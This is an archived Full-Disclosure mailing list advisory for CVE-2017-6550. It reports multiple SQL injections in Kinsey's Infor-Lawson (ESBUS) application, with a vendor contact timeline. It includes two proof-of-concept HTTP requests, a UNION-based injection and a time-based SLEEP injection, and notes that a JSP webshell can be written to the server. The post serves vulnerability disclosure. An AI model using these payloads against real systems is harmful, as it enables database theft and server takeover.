lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <iEMjbT2mtj-iVVGVtUVVZ7x51e0RNVGxdm0DQ1ReKziw26eeaTRncZz9LuPKfElQv6daj4EiAFPt_pq802Aj2-UnTBjW2D0lOJGAlzya3K0=@protonmail.com> Date: Fri, 10 Mar 2017 10:40:07 -0500 From: Michael Benich <benichmt1@...tonmail.com> To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org> Subject: [FD] CVE-2017-6550: Kinsey Infor-Lawson - Multiple SQL Injections Summary: Kinsey's Infor-Lawson application (formerly ESBUS) is vulnerable to SQL injection in at least two parameters: ------------------------------------------------------------------------ Vendor: Kinsey ------------------------------------------------------------------------ Software Link: [](https://c4b.epson-biz.com/modules/community/index.php?content_id=50)http://www.kinsey.com/infor-lawson.html ------------------------------------------------------------------------ Identifier: CVE-2017-6550 ------------------------------------------------------------------------ Tested on: Windows Server 2008 R2; MySQL ver 5.5 ------------------------------------------------------------------------ Exploit Author: Michael Benich Contact: benichmt1 [at] protonmail.com or @benichmt1 ------------------------------------------------------------------------ PoC: 1) TABLE parameter, PoC below GET /esbus/servlet/GetSQLData?SCHEMA=ESBUS_INTERNAL&TABLE=SCHEDULEDTASKS UNION ALL SELECT <<ATTACKER INPUT>>&FIELD=LASTRUN&NOHEADER=1&SELECT=CLASS=com.esbus.appliance.SOD_PolicyCheck_SystemRun_TimerTask&OUT=XML HTTP/1.1 ------------------------------------------------------------------------ 2) Query POST parameter POST /KK_LS9ReportingPortal/GetData?SERVERID=%27;LSF_PROD& HTTP/1.1 <--snip--http headers--> QUERY=1 AND SLEEP(5) AND ('foo'='foo')) &OUT=TAB ------------------------------------------------------------------------ A JSP webshell can then be written to the /esbus/ directory. ------------------------------------------------------------------------ Timeline: 12/1/2016 - Discovery. Contacted generic security emails 12/1/2016 - Received response from vendor ("Thanks for the info...") 2/27/2017 - Followed up with contact and intent to disclose. No reply. 3/10/2017 - Disclosure ------------------------------------------------------------------------ _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists